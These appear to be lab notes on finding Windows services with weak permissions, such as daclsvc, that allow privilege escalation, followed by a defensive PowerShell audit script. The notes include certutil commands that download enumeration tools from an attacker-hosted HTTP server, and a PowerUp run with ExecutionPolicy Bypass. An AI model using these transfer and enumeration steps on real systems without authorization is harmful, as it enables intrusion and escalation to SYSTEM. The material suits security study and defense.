
ENUMERATING SERVICES MANUALLY

  1. We can use the wmic command to list all non-standard services (those whose binary does not live under C:\Windows) with the following command:
    wmic service get name,displayname,pathname,startmode |findstr /i /v "C:\Windows\\"

  2. To do the same in PowerShell, use the Get-WmiObject cmdlet as shown:
    Get-WmiObject -class Win32_Service -Property Name,DisplayName,PathName,StartMode | Where {$_.PathName -notlike "C:\Windows\*"} | Select PathName,DisplayName,Name

ENUMERATING SERVICES WITH ACCESSCHK

  1. If you don't have the Sysinternals Suite on your machine, you can download it from the official Microsoft website.

    NOTE: We have identified that the target machine is 64-bit using the following command (so we need the 64-bit accesschk binary):
    systeminfo | findstr /B /C:"System Type"

  2. Host the binary with a Python HTTP server on the attacking machine and transfer it to the target machine with certutil:
    certutil -urlcache -f http://[IP-ADDRESS]:8000/accesschk64.exe accesschk64.exe

  3. We can use accesschk64.exe to find any service that is writable by our current user / by any user:
    .\accesschk64.exe "%USERNAME%" -wuvc * -accepteula

    NOTE: In the output we can see that the daclsvc service grants SERVICE_CHANGE_CONFIG, which allows any user to modify the service configuration. The only other permission that allows a service to be modified this way is SERVICE_ALL_ACCESS.

  4. We can use PowerUp to perform all of the misconfiguration / vulnerability checks at once (the script must be dot-sourced so that Invoke-AllChecks is defined in the calling scope):
    powershell -NoProfile -ExecutionPolicy Bypass -Command "& {. .\PowerUp.ps1; Invoke-AllChecks}"

ENUMERATING SERVICES PERMISSION WITH WINPEAS

  1. Since the target runs a 64-bit OS (see the systeminfo check above), we can serve the 64-bit winPEAS binary via a Python HTTP server:
    python3 -m http.server 8000


  2. Transfer winPEAS to the target machine using certutil:
    certutil -urlcache -f http://[IP-ADDRESS]:8000/winPEASx64.exe winPEASx64.exe

  3. Now all we need to do is run winPEAS and look for weak service permissions:
    .\winPEASx64.exe

    NOTE: The Services Information section in winPEAS provides a comprehensive list of all services, along with their configurations and potential security issues.

  4. If we somehow missed it there, scrolling down a bit further shows the same finding again in the Modifiable Services sub-section.

GATHERING SERVICE INFORMATION

  1. The pieces of information about the service we are most interested in are the start mode, the binary path and the StartName (the account the service runs as):
    sc qc daclsvc

  2. The same information using PowerShell:
    Get-WmiObject win32_service | ?{$_.Name -like 'daclsvc'} | select Name, DisplayName, StartMode, State, PathName, StartName

    NOTE: We can see that the StartName is LocalSystem, which means this service executes as SYSTEM. If it showed a different StartName, we would also need to modify that field to make sure the service executes as SYSTEM.

  3. We can use SetACL to enumerate the permissions on the daclsvc service we found, using the following command:
    .\SetACL.exe -on "daclsvc" -ot srv -actn list
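The following is an added audit script, not part of these notes, that does the accesschk and sc qc work above in one pass from the defender's side: it reads each service's security descriptor from sc.exe sdshow, flags Allow ACEs that grant SERVICE_CHANGE_CONFIG to broad well-known SIDs, and attaches the StartName so services running as LocalSystem stand out. It assumes Windows PowerShell 5.1 or later on the host being audited and sc.exe on the PATH; the list of "broad" SIDs is my own choice.

```powershell
# Added audit example, not from the original notes (assumptions in the lead-in above).
# Flags services whose DACL grants SERVICE_CHANGE_CONFIG to a broad principal and shows the run-as account.
$ServiceChangeConfig = 0x0002   # SERVICE_ALL_ACCESS (0xF01FF) includes this bit, so one test covers both
# Well-known SIDs that mean "more or less every user on the box"
$BroadSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'Users'
    'S-1-5-4'      = 'INTERACTIVE'
}

function Get-ServiceSddl {
    param([string]$Name)
    # sc.exe sdshow prints the service security descriptor as one SDDL line beginning with "D:"
    $out = & sc.exe sdshow $Name 2>$null
    return ($out | Where-Object { $_ -match '^D:' } | Select-Object -First 1)
}

function Find-WeakServiceDacl {
    # StartName (run-as account) per service, the same field the Get-WmiObject query above prints
    $runAs = @{}
    Get-CimInstance -ClassName Win32_Service | ForEach-Object { $runAs[$_.Name] = $_.StartName }
    foreach ($svc in Get-Service) {
        $sddl = Get-ServiceSddl -Name $svc.Name
        if (-not $sddl) { continue }
        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
        foreach ($ace in $sd.DiscretionaryAcl) {
            # Only explicit Allow ACEs for a broad SID matter here
            if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }
            if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
            $sid = $ace.SecurityIdentifier.Value
            if (-not $BroadSids.ContainsKey($sid)) { continue }
            if (($ace.AccessMask -band $ServiceChangeConfig) -eq 0) { continue }
            [pscustomobject]@{
                Service    = $svc.Name
                Principal  = $BroadSids[$sid]
                AccessMask = ('0x{0:X}' -f $ace.AccessMask)
                StartName  = $runAs[$svc.Name]
            }
        }
    }
}

# Rows with StartName = LocalSystem are the SYSTEM-level findings; remediate by tightening the service DACL (sc sdset).
Find-WeakServiceDacl | Format-Table -AutoSize
```

On the lab host described above this reports daclsvc with a broad principal and StartName LocalSystem; on a hardened build it should return nothing.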